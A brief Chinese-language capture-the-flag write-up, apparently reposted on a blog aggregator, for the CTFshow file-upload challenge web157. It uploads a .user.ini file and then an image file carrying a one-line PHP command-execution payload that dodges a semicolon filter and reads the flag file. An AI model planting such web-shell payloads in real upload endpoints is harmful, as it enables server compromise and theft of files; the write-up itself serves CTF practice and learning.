CTFshow 文件上传 web157
生活随笔
收集整理的這篇文章主要介紹了
CTFshow 文件上传 web157
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
目錄
- 思路
- 總結(jié)
思路
直接在burp里面改target和host的值,或者在本地發(fā)包
成功上傳.user.ini
在上傳shell.png的時候,對比上題,;和反引號也不能用了,過濾;可以用閉合php標(biāo)簽用?>來繞過
shell.png
<?system('tac ../f*')?>訪問/upload,拿到flag
總結(jié)
…
總結(jié)
以上是生活随笔為你收集整理的CTFshow 文件上传 web157的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CTFshow 文件上传 web156
- 下一篇: CTFshow 文件上传 web159